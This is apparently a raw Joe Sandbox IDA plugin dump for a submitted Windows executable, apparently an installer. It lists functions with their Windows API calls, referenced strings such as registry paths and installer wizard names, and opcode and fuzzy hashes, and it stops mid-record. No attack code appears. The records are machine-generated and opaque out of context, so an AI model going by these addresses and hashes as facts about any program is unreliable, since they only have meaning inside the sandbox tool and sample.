                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047526B), ref: 00475059
                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047526B), ref: 00475070
                                                            • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                          Strings
                                                          • CreateFile
                                                          APIs
                                                            • Part of subcall function 00456E64: CoInitialize.OLE32(00000000), ref: 00456E6A
                                                            • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                            • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                          • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456EF8
                                                          Strings
                                                          Similarity
                                                          • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                          • String ID: SHCreateItemFromParsingName$shell32.dll
                                                          • API String ID: 2906209438-2320870614
                                                          • Opcode ID: 08d23a7e6096c5616a14a2d2cd89d11c62b3b5d1f72113431a163231d9b2ac33
                                                          • Instruction ID: 195fe0e36b32ee525331c9a8c220a45252f3edc4141651a384f0b9e1c2da6bc9
                                                          • Opcode Fuzzy Hash: 08d23a7e6096c5616a14a2d2cd89d11c62b3b5d1f72113431a163231d9b2ac33
                                                          • Instruction Fuzzy Hash: 45C00291B4265092CA40B7FA695261E28049B8031AB92813BB951A7587CA6C88099A6E
                                                          APIs
                                                            • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                            • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                          • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CC25
                                                          Strings
                                                          Similarity
                                                          • API ID: AddressErrorLibraryLoadModeProc
                                                          • String ID: SHPathPrepareForWriteA$shell32.dll
                                                          • API String ID: 2492108670-2683653824
                                                          • Opcode ID: 55b93e5fb714966f70f5ffd37ba9539aaa645b322ed6e907ef1699bb6481b051
                                                          • Instruction ID: f133f44782887ed2db26bd8e5f2adaf6b1782a38bec069888892578a86e918ee
                                                          • Opcode Fuzzy Hash: 55b93e5fb714966f70f5ffd37ba9539aaa645b322ed6e907ef1699bb6481b051
                                                          • Instruction Fuzzy Hash: 85B092A060274086CB00B7A2699262B28059740309B90803BB0889B286EA3C88121BEF
                                                          APIs
                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448701), ref: 00448644
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486C5
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID:
                                                          • API String ID: 2574300362-0
                                                          • Opcode ID: 38a0c8dcb6cfe2486321be47105cd2edcf630b03ef44025de89f80e5062423d0
                                                          • Instruction ID: 4a5ebe3fee4a2e51bf72c529b0c862ae9b4ea9e2815ff95c09d8a3db799a058c
                                                          • Opcode Fuzzy Hash: 38a0c8dcb6cfe2486321be47105cd2edcf630b03ef44025de89f80e5062423d0
                                                          • Instruction Fuzzy Hash: 4A515470E00105AFDB40EFA5C481AAEBBF9EB45315F11817FE814BB391DA789E05CB99
                                                          APIs
                                                          • GetSystemMenu.USER32(00000000,00000000,00000000,00481378), ref: 00481310
                                                          • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481321
                                                          • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481339
                                                          Similarity
                                                          • API ID: Menu$Append$System
                                                          • String ID:
                                                          • API String ID: 1489644407-0
                                                          • Opcode ID: 63b26f928f1c87accb3103f044f3acf90972e1faa844404f13018ca58e8bddc3
                                                          • Instruction ID: 5c8896f7e766c0ec1e9fe117ebe49108a2e73e6ee011f2acc73c141eda266b91
                                                          • Opcode Fuzzy Hash: 63b26f928f1c87accb3103f044f3acf90972e1faa844404f13018ca58e8bddc3
                                                          • Instruction Fuzzy Hash: F431A0307043441AE711FB759C82BAE3B989B55318F54997BBC00A62E3CA7C9C4A87AD
                                                          APIs
                                                          • 74D41520.VERSION(00000000,?,?,?,00496E0C), ref: 00452504
                                                          • 74D41500.VERSION(00000000,?,00000000,?,00000000,0045257F,?,00000000,?,?,?,00496E0C), ref: 00452531
                                                          • 74D41540.VERSION(?,004525A8,?,?,00000000,?,00000000,?,00000000,0045257F,?,00000000,?,?,?,00496E0C), ref: 0045254B
                                                          Similarity
                                                          • API ID: D41500D41520D41540
                                                          • String ID:
                                                          • API String ID: 2153611984-0
                                                          • Opcode ID: c4d10431c24d3ec04fd95a2756a86a033cda299e0aeed98268810ee563e95d09
                                                          • Instruction ID: e6b34cf6ad4872bd94a826b675f3d2b909ad99421c044533a40ff62eec17d383
                                                          • Opcode Fuzzy Hash: c4d10431c24d3ec04fd95a2756a86a033cda299e0aeed98268810ee563e95d09
                                                          • Instruction Fuzzy Hash: C2219531A00608BFDB01DAA98D519AFB7FCEB4A341F554477FC04E3242E6B9AE04C769
                                                          APIs
                                                          • 73A1A570.USER32(00000000,?,00000000,00000000,0044B485,?,00481BA7,?,?), ref: 0044B3F9
                                                          • SelectObject.GDI32(?,00000000), ref: 0044B41C
                                                          • 73A1A480.USER32(00000000,?,0044B45C,00000000,0044B455,?,00000000,?,00000000,00000000,0044B485,?,00481BA7,?,?), ref: 0044B44F
                                                          Similarity
                                                          • API ID: A480A570ObjectSelect
                                                          • String ID:
                                                          • API String ID: 1230475511-0
                                                          • Opcode ID: c86bc8a9f0cb4198ec92499236d982b336435bb3408aeec5184fda352670fa70
                                                          • Instruction ID: d0000cdbf443d5d41ac7fc8b7796d2cef13fade9d4e1083fbf8e955bfb0ad8b0
                                                          • Opcode Fuzzy Hash: c86bc8a9f0cb4198ec92499236d982b336435bb3408aeec5184fda352670fa70
                                                          • Instruction Fuzzy Hash: 94217770A04348AFEB11DFA6C851B9FBBB8DB49304F5184BAF904A6682D778D940CB59
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B144,?,00481BA7,?,?), ref: 0044B116
                                                          • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B129
                                                          • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B15D
                                                          Similarity
                                                          • API ID: DrawText$ByteCharMultiWide
                                                          • String ID:
                                                          • API String ID: 65125430-0
                                                          • Opcode ID: a3bbdd0e85052032b4464c044c199c381ab15dbe2007c11af0ea937095cc15c9
                                                          • Instruction ID: 20993999b02ad9b2d132c7482a3993701c750e35562fff3cb1b1e5e45c97fd42
                                                          • Opcode Fuzzy Hash: a3bbdd0e85052032b4464c044c199c381ab15dbe2007c11af0ea937095cc15c9
                                                          • Instruction Fuzzy Hash: 9211B9B17046047FEB00DA6A9C82D6F77EDEB49754F10417AF504D7290D6399E0186A9
                                                          APIs
                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0042440A
                                                          • TranslateMessage.USER32(?), ref: 00424487
                                                          • DispatchMessageA.USER32(?), ref: 00424491
                                                          Similarity
                                                          • API ID: Message$DispatchPeekTranslate
                                                          • String ID:
                                                          • API String ID: 4217535847-0
                                                          • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                          • Instruction ID: b41559e7cef9b8617ee35765752275fac57a970be1b78d71f4432c2d4d9c435b
                                                          • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                          • Instruction Fuzzy Hash: E911943030471096EA20F6A4E94179B73D4DFC1748F80485EF98997382D7BD9E45979F
                                                          APIs
                                                          • SetPropA.USER32(00000000,00000000), ref: 00416662
                                                          • SetPropA.USER32(00000000,00000000), ref: 00416677
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 0041669E
                                                          Similarity
                                                          • API ID: Prop$Window
                                                          • String ID:
                                                          • API String ID: 3363284559-0
                                                          • Opcode ID: c28d9c26afe72c5be1bf0cacc918de6e274a174950c4a3475c45b681fa8918c3
                                                          • Instruction ID: 2f709078d098ddf512341954ec1abde5ac178872df7165362e48a9b460053d77
                                                          • Opcode Fuzzy Hash: c28d9c26afe72c5be1bf0cacc918de6e274a174950c4a3475c45b681fa8918c3
                                                          • Instruction Fuzzy Hash: 11F0B271701210ABDB10AB599C85FA732DCAB09715F16017AB945EF286C6B8DD5087A8
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 0041EE5C
                                                          • IsWindowEnabled.USER32(?), ref: 0041EE66
                                                          • EnableWindow.USER32(?,00000000), ref: 0041EE8C
                                                          Similarity
                                                          • API ID: Window$EnableEnabledVisible
                                                          • String ID:
                                                          • API String ID: 3234591441-0
                                                          • Opcode ID: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                          • Instruction ID: 168d1bb9c0e6e8839a01a9d99d3d7c452caa6e9a1b9b90f31caf5ae3eef8e520
                                                          • Opcode Fuzzy Hash: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                          • Instruction Fuzzy Hash: 75E06D75100300AAE701AB2BDCC1B5B7ADCAB54350F02843FA9489B292D63ADC408B3C
                                                          APIs
                                                          • SetActiveWindow.USER32(?), ref: 00469E55
                                                          Strings
                                                          Similarity
                                                          • API ID: ActiveWindow
                                                          • String ID: PrepareToInstall
                                                          • API String ID: 2558294473-1101760603
                                                          • Opcode ID: 81b39a8fdeb0dad2a777ccf23e1b5cc1b94ea3789fac9a2a9b8faf6000b70bf0
                                                          • Instruction ID: e2c6ec18e62d86bdb0c44b4d883dda39cec9e825136043f452d3b1ffdd24169b
                                                          • Opcode Fuzzy Hash: 81b39a8fdeb0dad2a777ccf23e1b5cc1b94ea3789fac9a2a9b8faf6000b70bf0
                                                          • Instruction Fuzzy Hash: 32A12C34A00105DFCB00EF9AD986EDEB7F5EF48304F5580B6E404AB362D778AE459B99
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: /:*?"<>|
                                                          • API String ID: 0-4078764451
                                                          • Opcode ID: 6835233e7ea63174332d10e4dcc06dbd64aaa3a2a45f414fb28228d8854cf9c9
                                                          • Instruction ID: b0c2865fc5a4d1d7a494ca3edaa4dc5a45f3ff44e2e280cd3bc35834766e41d0
                                                          • Opcode Fuzzy Hash: 6835233e7ea63174332d10e4dcc06dbd64aaa3a2a45f414fb28228d8854cf9c9
                                                          • Instruction Fuzzy Hash: 1671D770B002546AEB20EB66DCC2BEE77A19F44704F50C067F580AB391E779AD85875F
                                                          APIs
                                                          • SetActiveWindow.USER32(?), ref: 00481C3A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ActiveWindow
                                                          • String ID: InitializeWizard
                                                          • API String ID: 2558294473-2356795471
                                                          • Opcode ID: fdb67a5f3bc31efd8c5029728f1dc86113fdadd76a2f434d4b50cbf8c80ff7a4
                                                          • Instruction ID: 5241d356f86f5b5e3f0808c496da9b9c49bd8f9ac143394a12901a1e43732a0a
                                                          • Opcode Fuzzy Hash: fdb67a5f3bc31efd8c5029728f1dc86113fdadd76a2f434d4b50cbf8c80ff7a4
                                                          • Instruction Fuzzy Hash: 411182342452009FD700EBA9ED96B693BE8EB65318F10043BE5018B2A1DA396C01CB2D
                                                          APIs
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047BFEA,00000000,0047C124), ref: 0047BDE9
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047BDB9
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion
                                                          • API String ID: 47109696-1019749484
                                                          • Opcode ID: f9eb47421012cec5c34730d2a4c0e30c6d7bbbf73eea55f5f75bb62311f339ce
                                                          • Instruction ID: 054ff1380bf98a065617cb750ccb895fcb12562a11c78c2a0c7ed737f373e9e0
                                                          • Opcode Fuzzy Hash: f9eb47421012cec5c34730d2a4c0e30c6d7bbbf73eea55f5f75bb62311f339ce
                                                          • Instruction Fuzzy Hash: F2F082317045186BDA10A65F9C42BEBA69DCB84758F20403BF508DB343DAB99E0242EC
                                                          APIs
                                                          • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F352,?,?,00000000,0046F516,?,_is1,?), ref: 0046ECE7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID: NoModify
                                                          • API String ID: 3702945584-1699962838
                                                          • Opcode ID: 7eb4ab459c3921dc5338c7b3abf7fd5903c54a3e898984c04107b97a88657072
                                                          • Instruction ID: 1140eb4c3ce40d11de990e217cdc8ecc45d3a806a677c2547659d4957ea667b8
                                                          • Opcode Fuzzy Hash: 7eb4ab459c3921dc5338c7b3abf7fd5903c54a3e898984c04107b97a88657072
                                                          • Instruction Fuzzy Hash: C6E04FB4640308BFEB04DB55DD4AF6AB7ECDB48724F104059BA049B280E674FE00C669
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          Strings
                                                          • System\CurrentControlSet\Control\Windows, xrefs: 0042DE2E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID: System\CurrentControlSet\Control\Windows
                                                          • API String ID: 71445658-1109719901
                                                          • Opcode ID: 3bdcab3ffa95dd7854a6d474c2ff8c4d7b332cac827883cc7250e5693ef667ec
                                                          • Instruction ID: d7cc6eff87d81a3ef1983a0911a62a1ada5c46f4ff843c2b0821017aeb54f6c2
                                                          • Opcode Fuzzy Hash: 3bdcab3ffa95dd7854a6d474c2ff8c4d7b332cac827883cc7250e5693ef667ec
                                                          • Instruction Fuzzy Hash: 88D0C972910228BBEB00DE89DC41DFB77ADDB19760F45802AFD04AB241C6B4EC519BF8
                                                          APIs
                                                          • GetACP.KERNEL32(?,?,00000001,00000000,0047DD9B,?,-0000001A,0047FC14,-00000010,?,00000004,0000001B,00000000,0047FF61,?,0045D988), ref: 0047DB32
                                                            • Part of subcall function 0042E314: 73A1A570.USER32(00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7), ref: 0042E323
                                                            • Part of subcall function 0042E314: EnumFontsA.GDI32(?,00000000,0042E300,00000000,00000000,0042E36C,?,00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000), ref: 0042E34E
                                                            • Part of subcall function 0042E314: 73A1A480.USER32(00000000,?,0042E373,00000000,00000000,0042E36C,?,00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000), ref: 0042E366
                                                          • SendNotifyMessageA.USER32(00020416,00000496,00002711,-00000001), ref: 0047DD02
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: A480A570EnumFontsMessageNotifySend
                                                          • String ID:
                                                          • API String ID: 2685184028-0
                                                          • Opcode ID: 1699f4068c0c5867e7106ba40e3d9973070bda02754bb9a23a09a502d1616ce7
                                                          • Instruction ID: 990e0cae6f69a79882f0940071147895bcf3dc4f71101f62f717fb2ce75f629c
                                                          • Opcode Fuzzy Hash: 1699f4068c0c5867e7106ba40e3d9973070bda02754bb9a23a09a502d1616ce7
                                                          • Instruction Fuzzy Hash: FD517074A101008BCB21EF26E98169637B9EF94308B50C57BA8499F367C778ED46CB9D
                                                          APIs
                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFCE,?,?,00000008,00000000,00000000,0042DFFB), ref: 0042DF64
                                                          • RegCloseKey.ADVAPI32(?,0042DFD5,?,00000000,00000000,00000000,00000000,00000000,0042DFCE,?,?,00000008,00000000,00000000,0042DFFB), ref: 0042DFC8
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseEnum
                                                          • String ID:
                                                          • API String ID: 2818636725-0
                                                          • Opcode ID: 9f8261b046af4c0305013da9979aadb613cc1e3f6400fb4ebe2b883e54c4606e
                                                          • Instruction ID: c872a63f9528d4f9380aaceb5e2d891e8c563da0940016be03c3acb485ce214c
                                                          • Opcode Fuzzy Hash: 9f8261b046af4c0305013da9979aadb613cc1e3f6400fb4ebe2b883e54c4606e
                                                          • Instruction Fuzzy Hash: A8319370F04258AEDB11DFA6DD42BBFBBB9EB49304F92447BE401E6281D6385E01CA1D
                                                          APIs
                                                          • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458098,00000000,00458080,?,?,?,00000000,00452836,?,?,?,00000001), ref: 00452810
                                                          • GetLastError.KERNEL32(00000000,00000000,?,?,00458098,00000000,00458080,?,?,?,00000000,00452836,?,?,?,00000001), ref: 00452818
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 2919029540-0
                                                          • Opcode ID: e0555b4cbc397befea5ce91cbbea4dedbfe526bfc705885143054cd240055755
                                                          • Instruction ID: e9b66965f7ed38539142cc2995e542ed63b4c0771d7d6ba66a5e4ac3981b0267
                                                          • Opcode Fuzzy Hash: e0555b4cbc397befea5ce91cbbea4dedbfe526bfc705885143054cd240055755
                                                          • Instruction Fuzzy Hash: 70113C72604608AF8B50DEADDD41D9FB7ECEB4D310B114567FD18D3241D674AD148BA8
                                                          APIs
                                                          • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFDA
                                                          • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B137,00000000,0040B14F,?,?,?,00000000), ref: 0040AFEB
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindFree
                                                          • String ID:
                                                          • API String ID: 4097029671-0
                                                          • Opcode ID: bd4d08f36a9d4a560adef0fa1bde098128f2b715f965cb3459cef9598ac6c158
                                                          • Instruction ID: aeeba5ce467f8effdb78304bcd792b874f75604bed8582862ca5d9c37e282381
                                                          • Opcode Fuzzy Hash: bd4d08f36a9d4a560adef0fa1bde098128f2b715f965cb3459cef9598ac6c158
                                                          • Instruction Fuzzy Hash: CE01DF71700700AFDB14EF65AC92A1B77ADDB4A714B11807AF400AB3D1DA39AC019AA9
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                          • 73A25940.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: A25940CurrentThread
                                                          • String ID:
                                                          • API String ID: 2655091166-0
                                                          • Opcode ID: b000ad2c2d45302efb537f6ed51b85bb3a5cc49cf8a353236d3522148df1097f
                                                          • Instruction ID: ec06e6b8def62778297c6a117e91140491810bf1675edd7fb5fc45fb14f34894
                                                          • Opcode Fuzzy Hash: b000ad2c2d45302efb537f6ed51b85bb3a5cc49cf8a353236d3522148df1097f
                                                          • Instruction Fuzzy Hash: D9015B76A04604BFD706CF6BDC1199ABBE8E789720B22887BEC04D3690E6355810DF18
                                                          APIs
                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00452C96
                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00452CBC), ref: 00452C9E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastMove
                                                          • String ID:
                                                          • API String ID: 55378915-0
                                                          • Opcode ID: 4b3f53bb71bbb3de239a758d95ad3dd7b2750d400091be83cb52db7a615a65e0
                                                          • Instruction ID: 72322736c602c8c7a1920fbe291f5aeb87443d44c1116871956ce6e3077d7411
                                                          • Opcode Fuzzy Hash: 4b3f53bb71bbb3de239a758d95ad3dd7b2750d400091be83cb52db7a615a65e0
                                                          • Instruction Fuzzy Hash: C9012671B00604AB8B01EB799D4189EB7ECDB4A32575045BBFC14E3343EA784E04456C
                                                          APIs
                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527A3), ref: 0045277D
                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,004527A3), ref: 00452785
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 9ee879c615aac4fee22e4c99406f95e71c245cbd6d77cc6155be40721354894d
                                                          • Instruction ID: e798b8fcaf2c893210dd6dd972d3083c0fc79cae1e6532b7171fe4e83a13409b
                                                          • Opcode Fuzzy Hash: 9ee879c615aac4fee22e4c99406f95e71c245cbd6d77cc6155be40721354894d
                                                          • Instruction Fuzzy Hash: E1F02871A04604BFCB00EF759E4159EB3E8DB0E721B1045B7FC04E3242E7B94E048598
                                                          APIs
                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00423241
